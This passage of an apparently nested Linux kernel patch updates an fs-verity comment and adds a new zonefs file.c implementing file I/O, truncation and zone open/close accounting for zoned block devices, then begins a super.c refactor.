+-	 * fs-verity now claims to be enforcing, we have to wipe the pagecache
+-	 * to ensure that all future reads are verified.
++	 * We no longer drop the inode's pagecache after enabling verity.  This
++	 * used to be done to try to avoid a race condition where pages could be
++	 * evicted after being used in the Merkle tree construction, then
++	 * re-instantiated by a concurrent read.  Such pages are unverified, and
++	 * the backing storage could have filled them with different content, so
++	 * they shouldn't be used to fulfill reads once verity is enabled.
++	 *
++	 * But, dropping the pagecache has a big performance impact, and it
++	 * doesn't fully solve the race condition anyway.  So for those reasons,
++	 * and also because this race condition isn't very important relatively
++	 * speaking (especially for small-ish files, where the chance of a page
++	 * being used, evicted, *and* re-instantiated all while enabling verity
++	 * is quite small), we no longer drop the inode's pagecache.
+ 	 */
+-	filemap_write_and_wait(inode->i_mapping);
+-	invalidate_inode_pages2(inode->i_mapping);
+ 
+ 	/*
+ 	 * allow_write_access() is needed to pair with deny_write_access().
+ 	 * Regardless, the filesystem won't allow writing to verity files.
+ 	 */
+-out_allow_write_access:
+ 	allow_write_access(filp);
+ out_drop_write:
+ 	mnt_drop_write_file(filp);
+diff --git a/fs/zonefs/Makefile b/fs/zonefs/Makefile
+index 9fe54f5319f22..645f7229de4a0 100644
+--- a/fs/zonefs/Makefile
++++ b/fs/zonefs/Makefile
+@@ -3,4 +3,4 @@ ccflags-y				+= -I$(src)
+ 
+ obj-$(CONFIG_ZONEFS_FS) += zonefs.o
+ 
+-zonefs-y	:= super.o sysfs.o
++zonefs-y	:= super.o file.o sysfs.o
+diff --git a/fs/zonefs/file.c b/fs/zonefs/file.c
+new file mode 100644
+index 0000000000000..63cd50840419c
+--- /dev/null
++++ b/fs/zonefs/file.c
+@@ -0,0 +1,902 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ * Simple file system for zoned block devices exposing zones as files.
++ *
++ * Copyright (C) 2022 Western Digital Corporation or its affiliates.
++ */
++#include <linux/module.h>
++#include <linux/pagemap.h>
++#include <linux/iomap.h>
++#include <linux/init.h>
++#include <linux/slab.h>
++#include <linux/blkdev.h>
++#include <linux/statfs.h>
++#include <linux/writeback.h>
++#include <linux/quotaops.h>
++#include <linux/seq_file.h>
++#include <linux/parser.h>
++#include <linux/uio.h>
++#include <linux/mman.h>
++#include <linux/sched/mm.h>
++#include <linux/task_io_accounting_ops.h>
++
++#include "zonefs.h"
++
++#include "trace.h"
++
++static int zonefs_read_iomap_begin(struct inode *inode, loff_t offset,
++				   loff_t length, unsigned int flags,
++				   struct iomap *iomap, struct iomap *srcmap)
++{
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	struct super_block *sb = inode->i_sb;
++	loff_t isize;
++
++	/*
++	 * All blocks are always mapped below EOF. If reading past EOF,
++	 * act as if there is a hole up to the file maximum size.
++	 */
++	mutex_lock(&zi->i_truncate_mutex);
++	iomap->bdev = inode->i_sb->s_bdev;
++	iomap->offset = ALIGN_DOWN(offset, sb->s_blocksize);
++	isize = i_size_read(inode);
++	if (iomap->offset >= isize) {
++		iomap->type = IOMAP_HOLE;
++		iomap->addr = IOMAP_NULL_ADDR;
++		iomap->length = length;
++	} else {
++		iomap->type = IOMAP_MAPPED;
++		iomap->addr = (z->z_sector << SECTOR_SHIFT) + iomap->offset;
++		iomap->length = isize - iomap->offset;
++	}
++	mutex_unlock(&zi->i_truncate_mutex);
++
++	trace_zonefs_iomap_begin(inode, iomap);
++
++	return 0;
++}
++
++static const struct iomap_ops zonefs_read_iomap_ops = {
++	.iomap_begin	= zonefs_read_iomap_begin,
++};
++
++static int zonefs_write_iomap_begin(struct inode *inode, loff_t offset,
++				    loff_t length, unsigned int flags,
++				    struct iomap *iomap, struct iomap *srcmap)
++{
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	struct super_block *sb = inode->i_sb;
++	loff_t isize;
++
++	/* All write I/Os should always be within the file maximum size */
++	if (WARN_ON_ONCE(offset + length > z->z_capacity))
++		return -EIO;
++
++	/*
++	 * Sequential zones can only accept direct writes. This is already
++	 * checked when writes are issued, so warn if we see a page writeback
++	 * operation.
++	 */
++	if (WARN_ON_ONCE(zonefs_zone_is_seq(z) && !(flags & IOMAP_DIRECT)))
++		return -EIO;
++
++	/*
++	 * For conventional zones, all blocks are always mapped. For sequential
++	 * zones, all blocks after always mapped below the inode size (zone
++	 * write pointer) and unwriten beyond.
++	 */
++	mutex_lock(&zi->i_truncate_mutex);
++	iomap->bdev = inode->i_sb->s_bdev;
++	iomap->offset = ALIGN_DOWN(offset, sb->s_blocksize);
++	iomap->addr = (z->z_sector << SECTOR_SHIFT) + iomap->offset;
++	isize = i_size_read(inode);
++	if (iomap->offset >= isize) {
++		iomap->type = IOMAP_UNWRITTEN;
++		iomap->length = z->z_capacity - iomap->offset;
++	} else {
++		iomap->type = IOMAP_MAPPED;
++		iomap->length = isize - iomap->offset;
++	}
++	mutex_unlock(&zi->i_truncate_mutex);
++
++	trace_zonefs_iomap_begin(inode, iomap);
++
++	return 0;
++}
++
++static const struct iomap_ops zonefs_write_iomap_ops = {
++	.iomap_begin	= zonefs_write_iomap_begin,
++};
++
++static int zonefs_read_folio(struct file *unused, struct folio *folio)
++{
++	return iomap_read_folio(folio, &zonefs_read_iomap_ops);
++}
++
++static void zonefs_readahead(struct readahead_control *rac)
++{
++	iomap_readahead(rac, &zonefs_read_iomap_ops);
++}
++
++/*
++ * Map blocks for page writeback. This is used only on conventional zone files,
++ * which implies that the page range can only be within the fixed inode size.
++ */
++static int zonefs_write_map_blocks(struct iomap_writepage_ctx *wpc,
++				   struct inode *inode, loff_t offset)
++{
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++
++	if (WARN_ON_ONCE(zonefs_zone_is_seq(z)))
++		return -EIO;
++	if (WARN_ON_ONCE(offset >= i_size_read(inode)))
++		return -EIO;
++
++	/* If the mapping is already OK, nothing needs to be done */
++	if (offset >= wpc->iomap.offset &&
++	    offset < wpc->iomap.offset + wpc->iomap.length)
++		return 0;
++
++	return zonefs_write_iomap_begin(inode, offset,
++					z->z_capacity - offset,
++					IOMAP_WRITE, &wpc->iomap, NULL);
++}
++
++static const struct iomap_writeback_ops zonefs_writeback_ops = {
++	.map_blocks		= zonefs_write_map_blocks,
++};
++
++static int zonefs_writepages(struct address_space *mapping,
++			     struct writeback_control *wbc)
++{
++	struct iomap_writepage_ctx wpc = { };
++
++	return iomap_writepages(mapping, wbc, &wpc, &zonefs_writeback_ops);
++}
++
++static int zonefs_swap_activate(struct swap_info_struct *sis,
++				struct file *swap_file, sector_t *span)
++{
++	struct inode *inode = file_inode(swap_file);
++
++	if (zonefs_inode_is_seq(inode)) {
++		zonefs_err(inode->i_sb,
++			   "swap file: not a conventional zone file\n");
++		return -EINVAL;
++	}
++
++	return iomap_swapfile_activate(sis, swap_file, span,
++				       &zonefs_read_iomap_ops);
++}
++
++const struct address_space_operations zonefs_file_aops = {
++	.read_folio		= zonefs_read_folio,
++	.readahead		= zonefs_readahead,
++	.writepages		= zonefs_writepages,
++	.dirty_folio		= filemap_dirty_folio,
++	.release_folio		= iomap_release_folio,
++	.invalidate_folio	= iomap_invalidate_folio,
++	.migrate_folio		= filemap_migrate_folio,
++	.is_partially_uptodate	= iomap_is_partially_uptodate,
++	.error_remove_page	= generic_error_remove_page,
++	.direct_IO		= noop_direct_IO,
++	.swap_activate		= zonefs_swap_activate,
++};
++
++int zonefs_file_truncate(struct inode *inode, loff_t isize)
++{
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	loff_t old_isize;
++	enum req_op op;
++	int ret = 0;
++
++	/*
++	 * Only sequential zone files can be truncated and truncation is allowed
++	 * only down to a 0 size, which is equivalent to a zone reset, and to
++	 * the maximum file size, which is equivalent to a zone finish.
++	 */
++	if (!zonefs_zone_is_seq(z))
++		return -EPERM;
++
++	if (!isize)
++		op = REQ_OP_ZONE_RESET;
++	else if (isize == z->z_capacity)
++		op = REQ_OP_ZONE_FINISH;
++	else
++		return -EPERM;
++
++	inode_dio_wait(inode);
++
++	/* Serialize against page faults */
++	filemap_invalidate_lock(inode->i_mapping);
++
++	/* Serialize against zonefs_iomap_begin() */
++	mutex_lock(&zi->i_truncate_mutex);
++
++	old_isize = i_size_read(inode);
++	if (isize == old_isize)
++		goto unlock;
++
++	ret = zonefs_inode_zone_mgmt(inode, op);
++	if (ret)
++		goto unlock;
++
++	/*
++	 * If the mount option ZONEFS_MNTOPT_EXPLICIT_OPEN is set,
++	 * take care of open zones.
++	 */
++	if (z->z_flags & ZONEFS_ZONE_OPEN) {
++		/*
++		 * Truncating a zone to EMPTY or FULL is the equivalent of
++		 * closing the zone. For a truncation to 0, we need to
++		 * re-open the zone to ensure new writes can be processed.
++		 * For a truncation to the maximum file size, the zone is
++		 * closed and writes cannot be accepted anymore, so clear
++		 * the open flag.
++		 */
++		if (!isize)
++			ret = zonefs_inode_zone_mgmt(inode, REQ_OP_ZONE_OPEN);
++		else
++			z->z_flags &= ~ZONEFS_ZONE_OPEN;
++	}
++
++	zonefs_update_stats(inode, isize);
++	truncate_setsize(inode, isize);
++	z->z_wpoffset = isize;
++	zonefs_inode_account_active(inode);
++
++unlock:
++	mutex_unlock(&zi->i_truncate_mutex);
++	filemap_invalidate_unlock(inode->i_mapping);
++
++	return ret;
++}
++
++static int zonefs_file_fsync(struct file *file, loff_t start, loff_t end,
++			     int datasync)
++{
++	struct inode *inode = file_inode(file);
++	int ret = 0;
++
++	if (unlikely(IS_IMMUTABLE(inode)))
++		return -EPERM;
++
++	/*
++	 * Since only direct writes are allowed in sequential files, page cache
++	 * flush is needed only for conventional zone files.
++	 */
++	if (zonefs_inode_is_cnv(inode))
++		ret = file_write_and_wait_range(file, start, end);
++	if (!ret)
++		ret = blkdev_issue_flush(inode->i_sb->s_bdev);
++
++	if (ret)
++		zonefs_io_error(inode, true);
++
++	return ret;
++}
++
++static vm_fault_t zonefs_filemap_page_mkwrite(struct vm_fault *vmf)
++{
++	struct inode *inode = file_inode(vmf->vma->vm_file);
++	vm_fault_t ret;
++
++	if (unlikely(IS_IMMUTABLE(inode)))
++		return VM_FAULT_SIGBUS;
++
++	/*
++	 * Sanity check: only conventional zone files can have shared
++	 * writeable mappings.
++	 */
++	if (zonefs_inode_is_seq(inode))
++		return VM_FAULT_NOPAGE;
++
++	sb_start_pagefault(inode->i_sb);
++	file_update_time(vmf->vma->vm_file);
++
++	/* Serialize against truncates */
++	filemap_invalidate_lock_shared(inode->i_mapping);
++	ret = iomap_page_mkwrite(vmf, &zonefs_write_iomap_ops);
++	filemap_invalidate_unlock_shared(inode->i_mapping);
++
++	sb_end_pagefault(inode->i_sb);
++	return ret;
++}
++
++static const struct vm_operations_struct zonefs_file_vm_ops = {
++	.fault		= filemap_fault,
++	.map_pages	= filemap_map_pages,
++	.page_mkwrite	= zonefs_filemap_page_mkwrite,
++};
++
++static int zonefs_file_mmap(struct file *file, struct vm_area_struct *vma)
++{
++	/*
++	 * Conventional zones accept random writes, so their files can support
++	 * shared writable mappings. For sequential zone files, only read
++	 * mappings are possible since there are no guarantees for write
++	 * ordering between msync() and page cache writeback.
++	 */
++	if (zonefs_inode_is_seq(file_inode(file)) &&
++	    (vma->vm_flags & VM_SHARED) && (vma->vm_flags & VM_MAYWRITE))
++		return -EINVAL;
++
++	file_accessed(file);
++	vma->vm_ops = &zonefs_file_vm_ops;
++
++	return 0;
++}
++
++static loff_t zonefs_file_llseek(struct file *file, loff_t offset, int whence)
++{
++	loff_t isize = i_size_read(file_inode(file));
++
++	/*
++	 * Seeks are limited to below the zone size for conventional zones
++	 * and below the zone write pointer for sequential zones. In both
++	 * cases, this limit is the inode size.
++	 */
++	return generic_file_llseek_size(file, offset, whence, isize, isize);
++}
++
++static int zonefs_file_write_dio_end_io(struct kiocb *iocb, ssize_t size,
++					int error, unsigned int flags)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++
++	if (error) {
++		zonefs_io_error(inode, true);
++		return error;
++	}
++
++	if (size && zonefs_inode_is_seq(inode)) {
++		/*
++		 * Note that we may be seeing completions out of order,
++		 * but that is not a problem since a write completed
++		 * successfully necessarily means that all preceding writes
++		 * were also successful. So we can safely increase the inode
++		 * size to the write end location.
++		 */
++		mutex_lock(&zi->i_truncate_mutex);
++		if (i_size_read(inode) < iocb->ki_pos + size) {
++			zonefs_update_stats(inode, iocb->ki_pos + size);
++			zonefs_i_size_write(inode, iocb->ki_pos + size);
++		}
++		mutex_unlock(&zi->i_truncate_mutex);
++	}
++
++	return 0;
++}
++
++static const struct iomap_dio_ops zonefs_write_dio_ops = {
++	.end_io			= zonefs_file_write_dio_end_io,
++};
++
++static ssize_t zonefs_file_dio_append(struct kiocb *iocb, struct iov_iter *from)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	struct block_device *bdev = inode->i_sb->s_bdev;
++	unsigned int max = bdev_max_zone_append_sectors(bdev);
++	pgoff_t start, end;
++	struct bio *bio;
++	ssize_t size;
++	int nr_pages;
++	ssize_t ret;
++
++	max = ALIGN_DOWN(max << SECTOR_SHIFT, inode->i_sb->s_blocksize);
++	iov_iter_truncate(from, max);
++
++	/*
++	 * If the inode block size (zone write granularity) is smaller than the
++	 * page size, we may be appending data belonging to the last page of the
++	 * inode straddling inode->i_size, with that page already cached due to
++	 * a buffered read or readahead. So make sure to invalidate that page.
++	 * This will always be a no-op for the case where the block size is
++	 * equal to the page size.
++	 */
++	start = iocb->ki_pos >> PAGE_SHIFT;
++	end = (iocb->ki_pos + iov_iter_count(from) - 1) >> PAGE_SHIFT;
++	if (invalidate_inode_pages2_range(inode->i_mapping, start, end))
++		return -EBUSY;
++
++	nr_pages = iov_iter_npages(from, BIO_MAX_VECS);
++	if (!nr_pages)
++		return 0;
++
++	bio = bio_alloc(bdev, nr_pages,
++			REQ_OP_ZONE_APPEND | REQ_SYNC | REQ_IDLE, GFP_NOFS);
++	bio->bi_iter.bi_sector = z->z_sector;
++	bio->bi_ioprio = iocb->ki_ioprio;
++	if (iocb_is_dsync(iocb))
++		bio->bi_opf |= REQ_FUA;
++
++	ret = bio_iov_iter_get_pages(bio, from);
++	if (unlikely(ret))
++		goto out_release;
++
++	size = bio->bi_iter.bi_size;
++	task_io_account_write(size);
++
++	if (iocb->ki_flags & IOCB_HIPRI)
++		bio_set_polled(bio, iocb);
++
++	ret = submit_bio_wait(bio);
++
++	/*
++	 * If the file zone was written underneath the file system, the zone
++	 * write pointer may not be where we expect it to be, but the zone
++	 * append write can still succeed. So check manually that we wrote where
++	 * we intended to, that is, at zi->i_wpoffset.
++	 */
++	if (!ret) {
++		sector_t wpsector =
++			z->z_sector + (z->z_wpoffset >> SECTOR_SHIFT);
++
++		if (bio->bi_iter.bi_sector != wpsector) {
++			zonefs_warn(inode->i_sb,
++				"Corrupted write pointer %llu for zone at %llu\n",
++				bio->bi_iter.bi_sector, z->z_sector);
++			ret = -EIO;
++		}
++	}
++
++	zonefs_file_write_dio_end_io(iocb, size, ret, 0);
++	trace_zonefs_file_dio_append(inode, size, ret);
++
++out_release:
++	bio_release_pages(bio, false);
++	bio_put(bio);
++
++	if (ret >= 0) {
++		iocb->ki_pos += size;
++		return size;
++	}
++
++	return ret;
++}
++
++/*
++ * Do not exceed the LFS limits nor the file zone size. If pos is under the
++ * limit it becomes a short access. If it exceeds the limit, return -EFBIG.
++ */
++static loff_t zonefs_write_check_limits(struct file *file, loff_t pos,
++					loff_t count)
++{
++	struct inode *inode = file_inode(file);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	loff_t limit = rlimit(RLIMIT_FSIZE);
++	loff_t max_size = z->z_capacity;
++
++	if (limit != RLIM_INFINITY) {
++		if (pos >= limit) {
++			send_sig(SIGXFSZ, current, 0);
++			return -EFBIG;
++		}
++		count = min(count, limit - pos);
++	}
++
++	if (!(file->f_flags & O_LARGEFILE))
++		max_size = min_t(loff_t, MAX_NON_LFS, max_size);
++
++	if (unlikely(pos >= max_size))
++		return -EFBIG;
++
++	return min(count, max_size - pos);
++}
++
++static ssize_t zonefs_write_checks(struct kiocb *iocb, struct iov_iter *from)
++{
++	struct file *file = iocb->ki_filp;
++	struct inode *inode = file_inode(file);
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	loff_t count;
++
++	if (IS_SWAPFILE(inode))
++		return -ETXTBSY;
++
++	if (!iov_iter_count(from))
++		return 0;
++
++	if ((iocb->ki_flags & IOCB_NOWAIT) && !(iocb->ki_flags & IOCB_DIRECT))
++		return -EINVAL;
++
++	if (iocb->ki_flags & IOCB_APPEND) {
++		if (zonefs_zone_is_cnv(z))
++			return -EINVAL;
++		mutex_lock(&zi->i_truncate_mutex);
++		iocb->ki_pos = z->z_wpoffset;
++		mutex_unlock(&zi->i_truncate_mutex);
++	}
++
++	count = zonefs_write_check_limits(file, iocb->ki_pos,
++					  iov_iter_count(from));
++	if (count < 0)
++		return count;
++
++	iov_iter_truncate(from, count);
++	return iov_iter_count(from);
++}
++
++/*
++ * Handle direct writes. For sequential zone files, this is the only possible
++ * write path. For these files, check that the user is issuing writes
++ * sequentially from the end of the file. This code assumes that the block layer
++ * delivers write requests to the device in sequential order. This is always the
++ * case if a block IO scheduler implementing the ELEVATOR_F_ZBD_SEQ_WRITE
++ * elevator feature is being used (e.g. mq-deadline). The block layer always
++ * automatically select such an elevator for zoned block devices during the
++ * device initialization.
++ */
++static ssize_t zonefs_file_dio_write(struct kiocb *iocb, struct iov_iter *from)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	struct super_block *sb = inode->i_sb;
++	bool sync = is_sync_kiocb(iocb);
++	bool append = false;
++	ssize_t ret, count;
++
++	/*
++	 * For async direct IOs to sequential zone files, refuse IOCB_NOWAIT
++	 * as this can cause write reordering (e.g. the first aio gets EAGAIN
++	 * on the inode lock but the second goes through but is now unaligned).
++	 */
++	if (zonefs_zone_is_seq(z) && !sync && (iocb->ki_flags & IOCB_NOWAIT))
++		return -EOPNOTSUPP;
++
++	if (iocb->ki_flags & IOCB_NOWAIT) {
++		if (!inode_trylock(inode))
++			return -EAGAIN;
++	} else {
++		inode_lock(inode);
++	}
++
++	count = zonefs_write_checks(iocb, from);
++	if (count <= 0) {
++		ret = count;
++		goto inode_unlock;
++	}
++
++	if ((iocb->ki_pos | count) & (sb->s_blocksize - 1)) {
++		ret = -EINVAL;
++		goto inode_unlock;
++	}
++
++	/* Enforce sequential writes (append only) in sequential zones */
++	if (zonefs_zone_is_seq(z)) {
++		mutex_lock(&zi->i_truncate_mutex);
++		if (iocb->ki_pos != z->z_wpoffset) {
++			mutex_unlock(&zi->i_truncate_mutex);
++			ret = -EINVAL;
++			goto inode_unlock;
++		}
++		mutex_unlock(&zi->i_truncate_mutex);
++		append = sync;
++	}
++
++	if (append) {
++		ret = zonefs_file_dio_append(iocb, from);
++	} else {
++		/*
++		 * iomap_dio_rw() may return ENOTBLK if there was an issue with
++		 * page invalidation. Overwrite that error code with EBUSY to
++		 * be consistent with zonefs_file_dio_append() return value for
++		 * similar issues.
++		 */
++		ret = iomap_dio_rw(iocb, from, &zonefs_write_iomap_ops,
++				   &zonefs_write_dio_ops, 0, NULL, 0);
++		if (ret == -ENOTBLK)
++			ret = -EBUSY;
++	}
++
++	if (zonefs_zone_is_seq(z) &&
++	    (ret > 0 || ret == -EIOCBQUEUED)) {
++		if (ret > 0)
++			count = ret;
++
++		/*
++		 * Update the zone write pointer offset assuming the write
++		 * operation succeeded. If it did not, the error recovery path
++		 * will correct it. Also do active seq file accounting.
++		 */
++		mutex_lock(&zi->i_truncate_mutex);
++		z->z_wpoffset += count;
++		zonefs_inode_account_active(inode);
++		mutex_unlock(&zi->i_truncate_mutex);
++	}
++
++inode_unlock:
++	inode_unlock(inode);
++
++	return ret;
++}
++
++static ssize_t zonefs_file_buffered_write(struct kiocb *iocb,
++					  struct iov_iter *from)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	ssize_t ret;
++
++	/*
++	 * Direct IO writes are mandatory for sequential zone files so that the
++	 * write IO issuing order is preserved.
++	 */
++	if (zonefs_inode_is_seq(inode))
++		return -EIO;
++
++	if (iocb->ki_flags & IOCB_NOWAIT) {
++		if (!inode_trylock(inode))
++			return -EAGAIN;
++	} else {
++		inode_lock(inode);
++	}
++
++	ret = zonefs_write_checks(iocb, from);
++	if (ret <= 0)
++		goto inode_unlock;
++
++	ret = iomap_file_buffered_write(iocb, from, &zonefs_write_iomap_ops);
++	if (ret > 0)
++		iocb->ki_pos += ret;
++	else if (ret == -EIO)
++		zonefs_io_error(inode, true);
++
++inode_unlock:
++	inode_unlock(inode);
++	if (ret > 0)
++		ret = generic_write_sync(iocb, ret);
++
++	return ret;
++}
++
++static ssize_t zonefs_file_write_iter(struct kiocb *iocb, struct iov_iter *from)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++
++	if (unlikely(IS_IMMUTABLE(inode)))
++		return -EPERM;
++
++	if (sb_rdonly(inode->i_sb))
++		return -EROFS;
++
++	/* Write operations beyond the zone capacity are not allowed */
++	if (iocb->ki_pos >= z->z_capacity)
++		return -EFBIG;
++
++	if (iocb->ki_flags & IOCB_DIRECT) {
++		ssize_t ret = zonefs_file_dio_write(iocb, from);
++
++		if (ret != -ENOTBLK)
++			return ret;
++	}
++
++	return zonefs_file_buffered_write(iocb, from);
++}
++
++static int zonefs_file_read_dio_end_io(struct kiocb *iocb, ssize_t size,
++				       int error, unsigned int flags)
++{
++	if (error) {
++		zonefs_io_error(file_inode(iocb->ki_filp), false);
++		return error;
++	}
++
++	return 0;
++}
++
++static const struct iomap_dio_ops zonefs_read_dio_ops = {
++	.end_io			= zonefs_file_read_dio_end_io,
++};
++
++static ssize_t zonefs_file_read_iter(struct kiocb *iocb, struct iov_iter *to)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	struct super_block *sb = inode->i_sb;
++	loff_t isize;
++	ssize_t ret;
++
++	/* Offline zones cannot be read */
++	if (unlikely(IS_IMMUTABLE(inode) && !(inode->i_mode & 0777)))
++		return -EPERM;
++
++	if (iocb->ki_pos >= z->z_capacity)
++		return 0;
++
++	if (iocb->ki_flags & IOCB_NOWAIT) {
++		if (!inode_trylock_shared(inode))
++			return -EAGAIN;
++	} else {
++		inode_lock_shared(inode);
++	}
++
++	/* Limit read operations to written data */
++	mutex_lock(&zi->i_truncate_mutex);
++	isize = i_size_read(inode);
++	if (iocb->ki_pos >= isize) {
++		mutex_unlock(&zi->i_truncate_mutex);
++		ret = 0;
++		goto inode_unlock;
++	}
++	iov_iter_truncate(to, isize - iocb->ki_pos);
++	mutex_unlock(&zi->i_truncate_mutex);
++
++	if (iocb->ki_flags & IOCB_DIRECT) {
++		size_t count = iov_iter_count(to);
++
++		if ((iocb->ki_pos | count) & (sb->s_blocksize - 1)) {
++			ret = -EINVAL;
++			goto inode_unlock;
++		}
++		file_accessed(iocb->ki_filp);
++		ret = iomap_dio_rw(iocb, to, &zonefs_read_iomap_ops,
++				   &zonefs_read_dio_ops, 0, NULL, 0);
++	} else {
++		ret = generic_file_read_iter(iocb, to);
++		if (ret == -EIO)
++			zonefs_io_error(inode, false);
++	}
++
++inode_unlock:
++	inode_unlock_shared(inode);
++
++	return ret;
++}
++
++/*
++ * Write open accounting is done only for sequential files.
++ */
++static inline bool zonefs_seq_file_need_wro(struct inode *inode,
++					    struct file *file)
++{
++	if (zonefs_inode_is_cnv(inode))
++		return false;
++
++	if (!(file->f_mode & FMODE_WRITE))
++		return false;
++
++	return true;
++}
++
++static int zonefs_seq_file_write_open(struct inode *inode)
++{
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	int ret = 0;
++
++	mutex_lock(&zi->i_truncate_mutex);
++
++	if (!zi->i_wr_refcnt) {
++		struct zonefs_sb_info *sbi = ZONEFS_SB(inode->i_sb);
++		unsigned int wro = atomic_inc_return(&sbi->s_wro_seq_files);
++
++		if (sbi->s_mount_opts & ZONEFS_MNTOPT_EXPLICIT_OPEN) {
++
++			if (sbi->s_max_wro_seq_files
++			    && wro > sbi->s_max_wro_seq_files) {
++				atomic_dec(&sbi->s_wro_seq_files);
++				ret = -EBUSY;
++				goto unlock;
++			}
++
++			if (i_size_read(inode) < z->z_capacity) {
++				ret = zonefs_inode_zone_mgmt(inode,
++							     REQ_OP_ZONE_OPEN);
++				if (ret) {
++					atomic_dec(&sbi->s_wro_seq_files);
++					goto unlock;
++				}
++				z->z_flags |= ZONEFS_ZONE_OPEN;
++				zonefs_inode_account_active(inode);
++			}
++		}
++	}
++
++	zi->i_wr_refcnt++;
++
++unlock:
++	mutex_unlock(&zi->i_truncate_mutex);
++
++	return ret;
++}
++
++static int zonefs_file_open(struct inode *inode, struct file *file)
++{
++	int ret;
++
++	ret = generic_file_open(inode, file);
++	if (ret)
++		return ret;
++
++	if (zonefs_seq_file_need_wro(inode, file))
++		return zonefs_seq_file_write_open(inode);
++
++	return 0;
++}
++
++static void zonefs_seq_file_write_close(struct inode *inode)
++{
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	struct super_block *sb = inode->i_sb;
++	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
++	int ret = 0;
++
++	mutex_lock(&zi->i_truncate_mutex);
++
++	zi->i_wr_refcnt--;
++	if (zi->i_wr_refcnt)
++		goto unlock;
++
++	/*
++	 * The file zone may not be open anymore (e.g. the file was truncated to
++	 * its maximum size or it was fully written). For this case, we only
++	 * need to decrement the write open count.
++	 */
++	if (z->z_flags & ZONEFS_ZONE_OPEN) {
++		ret = zonefs_inode_zone_mgmt(inode, REQ_OP_ZONE_CLOSE);
++		if (ret) {
++			__zonefs_io_error(inode, false);
++			/*
++			 * Leaving zones explicitly open may lead to a state
++			 * where most zones cannot be written (zone resources
++			 * exhausted). So take preventive action by remounting
++			 * read-only.
++			 */
++			if (z->z_flags & ZONEFS_ZONE_OPEN &&
++			    !(sb->s_flags & SB_RDONLY)) {
++				zonefs_warn(sb,
++					"closing zone at %llu failed %d\n",
++					z->z_sector, ret);
++				zonefs_warn(sb,
++					"remounting filesystem read-only\n");
++				sb->s_flags |= SB_RDONLY;
++			}
++			goto unlock;
++		}
++
++		z->z_flags &= ~ZONEFS_ZONE_OPEN;
++		zonefs_inode_account_active(inode);
++	}
++
++	atomic_dec(&sbi->s_wro_seq_files);
++
++unlock:
++	mutex_unlock(&zi->i_truncate_mutex);
++}
++
++static int zonefs_file_release(struct inode *inode, struct file *file)
++{
++	/*
++	 * If we explicitly open a zone we must close it again as well, but the
++	 * zone management operation can fail (either due to an IO error or as
++	 * the zone has gone offline or read-only). Make sure we don't fail the
++	 * close(2) for user-space.
++	 */
++	if (zonefs_seq_file_need_wro(inode, file))
++		zonefs_seq_file_write_close(inode);
++
++	return 0;
++}
++
++const struct file_operations zonefs_file_operations = {
++	.open		= zonefs_file_open,
++	.release	= zonefs_file_release,
++	.fsync		= zonefs_file_fsync,
++	.mmap		= zonefs_file_mmap,
++	.llseek		= zonefs_file_llseek,
++	.read_iter	= zonefs_file_read_iter,
++	.write_iter	= zonefs_file_write_iter,
++	.splice_read	= generic_file_splice_read,
++	.splice_write	= iter_file_splice_write,
++	.iopoll		= iocb_bio_iopoll,
++};
+diff --git a/fs/zonefs/super.c b/fs/zonefs/super.c
+index a9c5c3f720adf..270ded209dde5 100644
+--- a/fs/zonefs/super.c
++++ b/fs/zonefs/super.c
+@@ -28,33 +28,47 @@
+ #include "trace.h"
+ 
+ /*
+- * Manage the active zone count. Called with zi->i_truncate_mutex held.
++ * Get the name of a zone group directory.
+  */
+-static void zonefs_account_active(struct inode *inode)
++static const char *zonefs_zgroup_name(enum zonefs_ztype ztype)
+ {
+-	struct zonefs_sb_info *sbi = ZONEFS_SB(inode->i_sb);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	switch (ztype) {
++	case ZONEFS_ZTYPE_CNV:
++		return "cnv";
++	case ZONEFS_ZTYPE_SEQ:
++		return "seq";
++	default:
++		WARN_ON_ONCE(1);
++		return "???";
++	}
++}
+ 
+-	lockdep_assert_held(&zi->i_truncate_mutex);
++/*
++ * Manage the active zone count.
++ */
++static void zonefs_account_active(struct super_block *sb,
++				  struct zonefs_zone *z)
++{
++	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+ 
+-	if (zi->i_ztype != ZONEFS_ZTYPE_SEQ)
++	if (zonefs_zone_is_cnv(z))
+ 		return;
+ 
+ 	/*
+ 	 * For zones that transitioned to the offline or readonly condition,
+ 	 * we only need to clear the active state.
+ 	 */
+-	if (zi->i_flags & (ZONEFS_ZONE_OFFLINE | ZONEFS_ZONE_READONLY))
++	if (z->z_flags & (ZONEFS_ZONE_OFFLINE | ZONEFS_ZONE_READONLY))
+ 		goto out;
+ 
+ 	/*
+ 	 * If the zone is active, that is, if it is explicitly open or
+ 	 * partially written, check if it was already accounted as active.
+ 	 */
+-	if ((zi->i_flags & ZONEFS_ZONE_OPEN) ||
+-	    (zi->i_wpoffset > 0 && zi->i_wpoffset < zi->i_max_size)) {
